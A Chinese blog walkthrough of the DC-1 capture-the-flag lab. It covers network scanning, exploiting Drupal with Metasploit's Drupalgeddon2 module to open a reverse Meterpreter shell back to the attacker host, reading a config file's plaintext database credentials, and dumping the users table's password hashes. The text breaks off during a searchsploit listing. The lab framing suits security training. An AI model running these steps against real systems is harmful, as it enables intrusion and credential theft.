精华内容
下载资源
问答
  • 更多相关内容
  • DC-1靶机渗透测试记录

    千次阅读 2020-12-18 17:11:23
    步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。 ┌──(root??kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, ...

    攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。
    攻击机IP 192.168.56.103

    步骤1 靶机目标发现
    因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。

    ┌──(root??kali)-[~]
    └─# arp-scan -l
    Interface: eth0, type: EN10MB, MAC: 08:00:27:83:cd:26, IPv4: 192.168.56.103
    Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.56.1    0a:00:27:00:00:14       (Unknown: locally administered)
    192.168.56.100  08:00:27:03:d6:2e       PCS Systemtechnik GmbH
    192.168.56.100  08:00:27:ec:2e:b6       PCS Systemtechnik GmbH (DUP: 2)
    192.168.56.102  08:00:27:ab:b3:05       PCS Systemtechnik GmbH
    192.168.56.115  08:00:27:2b:13:12       PCS Systemtechnik GmbH
    
    6 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.9.7: 256 hosts scanned in 2.106 seconds (121.56 hosts/sec). 5 responded

    找到靶机的IP为192.168.56.102后,对该主机进行端口扫描,查看开了哪些端口以及端口其他信息。

    ┌──(root??kali)-[~]
    └─# nmap -sS -p- -A 192.168.56.102
    Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-17 22:15 EST
    mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
    Nmap scan report for 192.168.56.102
    Host is up (0.00068s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    | ssh-hostkey:
    |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
    |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
    |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
    80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
    |_http-generator: Drupal 7 (http://drupal.org)
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
    |_/LICENSE.txt /MAINTAINERS.txt
    |_http-server-header: Apache/2.2.22 (Debian)
    |_http-title: Welcome to Drupal Site | Drupal Site
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          36135/udp   status
    |   100024  1          36754/tcp   status
    |   100024  1          42863/tcp6  status
    |_  100024  1          52263/udp6  status
    36754/tcp open  status  1 (RPC #100024)
    MAC Address: 08:00:27:AB:B3:05 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.2 - 3.16
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.68 ms 192.168.56.102
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
    

    步骤2 漏洞利用
    注意到80端口是开放的,所以关注到http://192.168.56.102网页。

     

    注意到页面上有"Drupal Site"的字样,便尝试用metasploit查找一下有没有可以利用的已知漏洞。经过反复尝试,找到drupal_drupalgeddon2 可以利用成功。

    ┌──(root??kali)-[~]
    └─# msfconsole
    
         ,           ,
        /             \
       ((__---,,,---__))
          (_) O O (_)_________
             \ _ /            |\
              o_o \   M S F   | \
                   \   _____  |  *
                    |||   WW|||
                    |||     |||
    
    
           =[ metasploit v6.0.15-dev                          ]
    + -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
    + -- --=[ 592 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    
    Metasploit tip: You can use help to view all available commands
    
    msf6 > search Drupal
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank       Check  Description
       -  ----                                           ---------------  ----       -----  -----------
       0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
       1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
       2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
       3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
       4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
       5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
       6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
       7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
    
    
    Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
    
    msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
    [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
    
    Module options (exploit/unix/webapp/drupal_drupalgeddon2):
    
       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       DUMP_OUTPUT  false            no        Dump payload command output
       PHP_FUNC     passthru         yes       PHP function to execute
       Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        80               yes       The target port (TCP)
       SSL          false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI    /                yes       Path to Drupal install
       VHOST                         no        HTTP server virtual host
    
    
    Payload options (php/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic (PHP In-Memory)
    
    
    
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.102
    RHOSTS => 192.168.56.102
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.103
    LHOST => 192.168.56.103
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
    
    [*] Started reverse TCP handler on 192.168.56.103:4444
    [*] Sending stage (39282 bytes) to 192.168.56.102
    [*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.102:40395) at 2020-12-17 22:36:21 -0500
    
    meterpreter >
    
    

    步骤3 找到flag1
    看样子应该漏洞利用成功了,我们看看现在是什么目录,我们能不能访问靶机目录下的文件。找到了flag1.txt,里面的意思是提醒我要关注配置文件。

    meterpreter > pwd
    /var/www
    meterpreter > ls
    Listing: /var/www
    =================
    
    Mode              Size   Type  Last modified              Name
    ----              ----   ----  -------------              ----
    100644/rw-r--r--  174    fil   2013-11-20 15:45:59 -0500  .gitignore
    100644/rw-r--r--  5767   fil   2013-11-20 15:45:59 -0500  .htaccess
    100644/rw-r--r--  1481   fil   2013-11-20 15:45:59 -0500  COPYRIGHT.txt
    100644/rw-r--r--  1451   fil   2013-11-20 15:45:59 -0500  INSTALL.mysql.txt
    100644/rw-r--r--  1874   fil   2013-11-20 15:45:59 -0500  INSTALL.pgsql.txt
    100644/rw-r--r--  1298   fil   2013-11-20 15:45:59 -0500  INSTALL.sqlite.txt
    100644/rw-r--r--  17861  fil   2013-11-20 15:45:59 -0500  INSTALL.txt
    100755/rwxr-xr-x  18092  fil   2013-11-01 06:14:15 -0400  LICENSE.txt
    100644/rw-r--r--  8191   fil   2013-11-20 15:45:59 -0500  MAINTAINERS.txt
    100644/rw-r--r--  5376   fil   2013-11-20 15:45:59 -0500  README.txt
    100644/rw-r--r--  9642   fil   2013-11-20 15:45:59 -0500  UPGRADE.txt
    100644/rw-r--r--  6604   fil   2013-11-20 15:45:59 -0500  authorize.php
    100644/rw-r--r--  720    fil   2013-11-20 15:45:59 -0500  cron.php
    100644/rw-r--r--  52     fil   2019-02-19 08:20:46 -0500  flag1.txt
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  includes
    100644/rw-r--r--  529    fil   2013-11-20 15:45:59 -0500  index.php
    100644/rw-r--r--  703    fil   2013-11-20 15:45:59 -0500  install.php
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  misc
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  modules
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  profiles
    100644/rw-r--r--  1561   fil   2013-11-20 15:45:59 -0500  robots.txt
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  scripts
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  sites
    40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  themes
    100644/rw-r--r--  19941  fil   2013-11-20 15:45:59 -0500  update.php
    100644/rw-r--r--  2178   fil   2013-11-20 15:45:59 -0500  web.config
    100644/rw-r--r--  417    fil   2013-11-20 15:45:59 -0500  xmlrpc.php
    
    meterpreter > cat flag1.txt
    Every good CMS needs a config file - and so do you.

    步骤4 flag2获取
    那就按照flag1的提示找找配置文件吧。
    找啊找,找到数据库的配置文件看到flag2,同时也发现有明文显示的数据账号密码。

    meterpreter > pwd
    /var/www/sites/default
    meterpreter > cat settings.php
    <?php
    
    /**
     *
     * flag2
     * Brute force and dictionary attacks aren't the
     * only ways to gain access (and you WILL need access).
     * What can you do with these credentials?
     *
     */
    
    $databases = array (
      'default' =>
      array (
        'default' =>
        array (
          'database' => 'drupaldb',
          'username' => 'dbuser',
          'password' => 'R0ck3t',
          'host' => 'localhost',
          'port' => '',
          'driver' => 'mysql',
          'prefix' => '',
        ),
      ),
    );
    
    /**
     * Access control for update.php script.
     *
     * If you are updating your Drupal installation using the update.php script but
     * are not logged in using either an account with the "Administer software
     * updates" permission or the site maintenance account (the account that was
     * created during installation), you will need to modify the access check
     * statement below. Change the FALSE to a TRUE to disable the access check.
     * After finishing the upgrade, be sure to open this file again and change the
     * TRUE back to a FALSE!
     */
    $update_free_access = FALSE;
    
    /**
     * Salt for one-time login links and cancel links, form tokens, etc.
     *
     * This variable will be set to a random value by the installer. All one-time
     * login links will be invalidated if the value is changed. Note that if your
     * site is deployed on a cluster of web servers, you must ensure that this
     * variable has the same value on each server. If this variable is empty, a hash
     * of the serialized database credentials will be used as a fallback salt.
     *
     * For enhanced security, you may set this variable to a value using the
     * contents of a file outside your docroot that is never saved together
     * with any backups of your Drupal files and database.
     *
     * Example:
     *   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
     *
     */
    $drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';
    
    /**
     * Base URL (optional).
     *
     * If Drupal is generating incorrect URLs on your site, which could
     * be in HTML headers (links to CSS and JS files) or visible links on pages
     * (such as in menus), uncomment the Base URL statement below (remove the
     * leading hash sign) and fill in the absolute URL to your Drupal installation.
     *
     * You might also want to force users to use a given domain.
     * See the .htaccess file for more information.
     *
     * Examples:
     *   $base_url = 'http://www.example.com';
     *   $base_url = 'http://www.example.com:8888';
     *   $base_url = 'http://www.example.com/drupal';
     *   $base_url = 'https://www.example.com:8888/drupal';
     *
     * It is not allowed to have a trailing slash; Drupal will add it
     * for you.
     */
    # $base_url = 'http://www.example.com';  // NO trailing slash!
    
    /**
     * PHP settings:
     *
     * To see what PHP settings are possible, including whether they can be set at
     * runtime (by using ini_set()), read the PHP documentation:
     * http://www.php.net/manual/en/ini.list.php
     * See drupal_environment_initialize() in includes/bootstrap.inc for required
     * runtime settings and the .htaccess file for non-runtime settings. Settings
     * defined there should not be duplicated here so as to avoid conflict issues.
     */
    
    /**
     * Some distributions of Linux (most notably Debian) ship their PHP
     * installations with garbage collection (gc) disabled. Since Drupal depends on
     * PHP's garbage collection for clearing sessions, ensure that garbage
     * collection occurs by using the most common settings.
     */
    ini_set('session.gc_probability', 1);
    ini_set('session.gc_divisor', 100);
    
    /**
     * Set session lifetime (in seconds), i.e. the time from the user's last visit
     * to the active session may be deleted by the session garbage collector. When
     * a session is deleted, authenticated users are logged out, and the contents
     * of the user's $_SESSION variable is discarded.
     */
    ini_set('session.gc_maxlifetime', 200000);
    
    /**
     * Set session cookie lifetime (in seconds), i.e. the time from the session is
     * created to the cookie expires, i.e. when the browser is expected to discard
     * the cookie. The value 0 means "until the browser is closed".
     */
    ini_set('session.cookie_lifetime', 2000000);
    
    /**
     * If you encounter a situation where users post a large amount of text, and
     * the result is stripped out upon viewing but can still be edited, Drupal's
     * output filter may not have sufficient memory to process it.  If you
     * experience this issue, you may wish to uncomment the following two lines
     * and increase the limits of these variables.  For more information, see
     * http://php.net/manual/en/pcre.configuration.php.
     */
    # ini_set('pcre.backtrack_limit', 200000);
    # ini_set('pcre.recursion_limit', 200000);
    
    /**
     * Drupal automatically generates a unique session cookie name for each site
     * based on its full domain name. If you have multiple domains pointing at the
     * same Drupal site, you can either redirect them all to a single domain (see
     * comment in .htaccess), or uncomment the line below and specify their shared
     * base domain. Doing so assures that users remain logged in as they cross
     * between your various domains. Make sure to always start the $cookie_domain
     * with a leading dot, as per RFC 2109.
     */
    # $cookie_domain = '.example.com';
    
    /**
     * Variable overrides:
     *
     * To override specific entries in the 'variable' table for this site,
     * set them here. You usually don't need to use this feature. This is
     * useful in a configuration file for a vhost or directory, rather than
     * the default settings.php. Any configuration setting from the 'variable'
     * table can be given a new value. Note that any values you provide in
     * these variable overrides will not be modifiable from the Drupal
     * administration interface.
     *
     * The following overrides are examples:
     * - site_name: Defines the site's name.
     * - theme_default: Defines the default theme for this site.
     * - anonymous: Defines the human-readable name of anonymous users.
     * Remove the leading hash signs to enable.
     */
    # $conf['site_name'] = 'My Drupal site';
    # $conf['theme_default'] = 'garland';
    # $conf['anonymous'] = 'Visitor';
    
    /**
     * A custom theme can be set for the offline page. This applies when the site
     * is explicitly set to maintenance mode through the administration page or when
     * the database is inactive due to an error. It can be set through the
     * 'maintenance_theme' key. The template file should also be copied into the
     * theme. It is located inside 'modules/system/maintenance-page.tpl.php'.
     * Note: This setting does not apply to installation and update pages.
     */
    # $conf['maintenance_theme'] = 'bartik';
    
    /**
     * Reverse Proxy Configuration:
     *
     * Reverse proxy servers are often used to enhance the performance
     * of heavily visited sites and may also provide other site caching,
     * security, or encryption benefits. In an environment where Drupal
     * is behind a reverse proxy, the real IP address of the client should
     * be determined such that the correct client IP address is available
     * to Drupal's logging, statistics, and access management systems. In
     * the most simple scenario, the proxy server will add an
     * X-Forwarded-For header to the request that contains the client IP
     * address. However, HTTP headers are vulnerable to spoofing, where a
     * malicious client could bypass restrictions by setting the
     * X-Forwarded-For header directly. Therefore, Drupal's proxy
     * configuration requires the IP addresses of all remote proxies to be
     * specified in $conf['reverse_proxy_addresses'] to work correctly.
     *
     * Enable this setting to get Drupal to determine the client IP from
     * the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).
     * If you are unsure about this setting, do not have a reverse proxy,
     * or Drupal operates in a shared hosting environment, this setting
     * should remain commented out.
     *
     * In order for this setting to be used you must specify every possible
     * reverse proxy IP address in $conf['reverse_proxy_addresses'].
     * If a complete list of reverse proxies is not available in your
     * environment (for example, if you use a CDN) you may set the
     * $_SERVER['REMOTE_ADDR'] variable directly in settings.php.
     * Be aware, however, that it is likely that this would allow IP
     * address spoofing unless more advanced precautions are taken.
     */
    # $conf['reverse_proxy'] = TRUE;
    
    /**
     * Specify every reverse proxy IP address in your environment.
     * This setting is required if $conf['reverse_proxy'] is TRUE.
     */
    # $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);
    
    /**
     * Set this value if your proxy server sends the client IP in a header
     * other than X-Forwarded-For.
     */
    # $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';
    
    /**
     * Page caching:
     *
     * By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page
     * views. This tells a HTTP proxy that it may return a page from its local
     * cache without contacting the web server, if the user sends the same Cookie
     * header as the user who originally requested the cached page. Without "Vary:
     * Cookie", authenticated users would also be served the anonymous page from
     * the cache. If the site has mostly anonymous users except a few known
     * editors/administrators, the Vary header can be omitted. This allows for
     * better caching in HTTP proxies (including reverse proxies), i.e. even if
     * clients send different cookies, they still get content served from the cache.
     * However, authenticated users should access the site directly (i.e. not use an
     * HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid
     * getting cached pages from the proxy.
     */
    # $conf['omit_vary_cookie'] = TRUE;
    
    /**
     * CSS/JS aggregated file gzip compression:
     *
     * By default, when CSS or JS aggregation and clean URLs are enabled Drupal will
     * store a gzip compressed (.gz) copy of the aggregated files. If this file is
     * available then rewrite rules in the default .htaccess file will serve these
     * files to browsers that accept gzip encoded content. This allows pages to load
     * faster for these users and has minimal impact on server load. If you are
     * using a webserver other than Apache httpd, or a caching reverse proxy that is
     * configured to cache and compress these files itself you may want to uncomment
     * one or both of the below lines, which will prevent gzip files being stored.
     */
    # $conf['css_gzip_compression'] = FALSE;
    # $conf['js_gzip_compression'] = FALSE;
    
    /**
     * String overrides:
     *
     * To override specific strings on your site with or without enabling the Locale
     * module, add an entry to this list. This functionality allows you to change
     * a small number of your site's default English language interface strings.
     *
     * Remove the leading hash signs to enable.
     */
    # $conf['locale_custom_strings_en'][''] = array(
    #   'forum'      => 'Discussion board',
    #   '@count min' => '@count minutes',
    # );
    
    /**
     *
     * IP blocking:
     *
     * To bypass database queries for denied IP addresses, use this setting.
     * Drupal queries the {blocked_ips} table by default on every page request
     * for both authenticated and anonymous users. This allows the system to
     * block IP addresses from within the administrative interface and before any
     * modules are loaded. However on high traffic websites you may want to avoid
     * this query, allowing you to bypass database access altogether for anonymous
     * users under certain caching configurations.
     *
     * If using this setting, you will need to add back any IP addresses which
     * you may have blocked via the administrative interface. Each element of this
     * array represents a blocked IP address. Uncommenting the array and leaving it
     * empty will have the effect of disabling IP blocking on your site.
     *
     * Remove the leading hash signs to enable.
     */
    # $conf['blocked_ips'] = array(
    #   'a.b.c.d',
    # );
    
    /**
     * Fast 404 pages:
     *
     * Drupal can generate fully themed 404 pages. However, some of these responses
     * are for images or other resource files that are not displayed to the user.
     * This can waste bandwidth, and also generate server load.
     *
     * The options below return a simple, fast 404 page for URLs matching a
     * specific pattern:
     * - 404_fast_paths_exclude: A regular expression to match paths to exclude,
     *   such as images generated by image styles, or dynamically-resized images.
     *   If you need to add more paths, you can add '|path' to the expression.
     * - 404_fast_paths: A regular expression to match paths that should return a
     *   simple 404 page, rather than the fully themed 404 page. If you don't have
     *   any aliases ending in htm or html you can add '|s?html?' to the expression.
     * - 404_fast_html: The html to return for simple 404 pages.
     *
     * Add leading hash signs if you would like to disable this functionality.
     */
    $conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
    $conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
    $conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';
    
    /**
     * By default the page request process will return a fast 404 page for missing
     * files if they match the regular expression set in '404_fast_paths' and not
     * '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in
     * the Drupal system log.
     *
     * You can choose to return a fast 404 page earlier for missing pages (as soon
     * as settings.php is loaded) by uncommenting the line below. This speeds up
     * server response time when loading 404 error pages and prevents the 404 error
     * from being logged in the Drupal system log. In order to prevent valid pages
     * such as image styles and other generated content that may match the
     * '404_fast_html' regular expression from returning 404 errors, it is necessary
     * to add them to the '404_fast_paths_exclude' regular expression above. Make
     * sure that you understand the effects of this feature before uncommenting the
     * line below.
     */
    # drupal_fast_404();
    
    /**
     * External access proxy settings:
     *
     * If your site must access the Internet via a web proxy then you can enter
     * the proxy settings here. Currently only basic authentication is supported
     * by using the username and password variables. The proxy_user_agent variable
     * can be set to NULL for proxies that require no User-Agent header or to a
     * non-empty string for proxies that limit requests to a specific agent. The
     * proxy_exceptions variable is an array of host names to be accessed directly,
     * not via proxy.
     */
    # $conf['proxy_server'] = '';
    # $conf['proxy_port'] = 8080;
    # $conf['proxy_username'] = '';
    # $conf['proxy_password'] = '';
    # $conf['proxy_user_agent'] = '';
    # $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');
    
    /**
     * Authorized file system operations:
     *
     * The Update manager module included with Drupal provides a mechanism for
     * site administrators to securely install missing updates for the site
     * directly through the web user interface. On securely-configured servers,
     * the Update manager will require the administrator to provide SSH or FTP
     * credentials before allowing the installation to proceed; this allows the
     * site to update the new files as the user who owns all the Drupal files,
     * instead of as the user the webserver is running as. On servers where the
     * webserver user is itself the owner of the Drupal files, the administrator
     * will not be prompted for SSH or FTP credentials (note that these server
     * setups are common on shared hosting, but are inherently insecure).
     *
     * Some sites might wish to disable the above functionality, and only update
     * the code directly via SSH or FTP themselves. This setting completely
     * disables all functionality related to these authorized file operations.
     *
     * @see http://drupal.org/node/244924
     *
     * Remove the leading hash signs to disable.
     */
    # $conf['allow_authorize_operations'] = FALSE;

    步骤5 数据库内搜索
    尝试用用获得的账号和密码登陆靶机数据库。注意到该靶机是支持python2.7的。因为执行了“python -c "import pty;pty.spawn('/bin/bash')”便于交互输入。

    meterpreter > shell
    Process 4998 created.
    Channel 3 created.
    python -c "import pty;pty.spawn('/bin/bash')"
    www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -pR0ck3t
    mysql -u dbuser -pR0ck3t
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 8555
    Server version: 5.5.60-0+deb7u1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
    
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    mysql>

    成功进入数据库了,下面在数据库里搜索信息

    mysql> show databases;
    show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | drupaldb           |
    +--------------------+
    2 rows in set (0.00 sec)
    mysql> use drupaldb
    use drupaldb
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Database changed
    
    mysql> show tables;
    show tables;
    +-----------------------------+
    | Tables_in_drupaldb          |
    +-----------------------------+
    | actions                     |
    | authmap                     |
    | batch                       |
    | block                       |
    | block_custom                |
    | block_node_type             |
    | block_role                  |
    | blocked_ips                 |
    | cache                       |
    | cache_block                 |
    | cache_bootstrap             |
    | cache_field                 |
    | cache_filter                |
    | cache_form                  |
    | cache_image                 |
    | cache_menu                  |
    | cache_page                  |
    | cache_path                  |
    | cache_update                |
    | cache_views                 |
    | cache_views_data            |
    | comment                     |
    | ctools_css_cache            |
    | ctools_object_cache         |
    | date_format_locale          |
    | date_format_type            |
    | date_formats                |
    | field_config                |
    | field_config_instance       |
    | field_data_body             |
    | field_data_comment_body     |
    | field_data_field_image      |
    | field_data_field_tags       |
    | field_revision_body         |
    | field_revision_comment_body |
    | field_revision_field_image  |
    | field_revision_field_tags   |
    | file_managed                |
    | file_usage                  |
    | filter                      |
    | filter_format               |
    | flood                       |
    | history                     |
    | image_effects               |
    | image_styles                |
    | menu_custom                 |
    | menu_links                  |
    | menu_router                 |
    | node                        |
    | node_access                 |
    | node_comment_statistics     |
    | node_revision               |
    | node_type                   |
    | queue                       |
    | rdf_mapping                 |
    | registry                    |
    | registry_file               |
    | role                        |
    | role_permission             |
    | search_dataset              |
    | search_index                |
    | search_node_links           |
    | search_total                |
    | semaphore                   |
    | sequences                   |
    | sessions                    |
    | shortcut_set                |
    | shortcut_set_users          |
    | system                      |
    | taxonomy_index              |
    | taxonomy_term_data          |
    | taxonomy_term_hierarchy     |
    | taxonomy_vocabulary         |
    | url_alias                   |
    | users                       |
    | users_roles                 |
    | variable                    |
    | views_display               |
    | views_view                  |
    | watchdog                    |
    +-----------------------------+
    80 rows in set (0.00 sec)

    查看所有的表,对名为users表比较感兴趣。查看表内数据希望能发现可用于登陆的账号密码。

    mysql> select * from users;
    select * from users;
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
    |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
    |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    3 rows in set (0.00 sec)

    发现用户的密码用不知名方法加密了,这咋办?是不是有办法可以增加一个用户呢?msf是个好工具,我们要充分利用它。果然找到了可以增加用户的漏洞利用方法。

    ┌──(root??kali)-[~]
    └─# msfconsole                                                                                                                     127 ?
    
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
    %%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
    %%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
    %%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
    %%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
    %%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    
    
           =[ metasploit v6.0.15-dev                          ]
    + -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
    + -- --=[ 592 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    
    Metasploit tip: You can use help to view all available commands
    
    msf6 > searchsploit drupal
    [*] exec: searchsploit drupal
    
    ------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                         |  Path
    ------------------------------------------------------------------------------------------------------- ---------------------------------
    Drupal 4.0 - News Message HTML Injection                                                               | php/webapps/21863.txt
    Drupal 4.1/4.2 - Cross-Site Scripting                                                                  | php/webapps/22940.txt
    Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                          | php/webapps/1088.pl
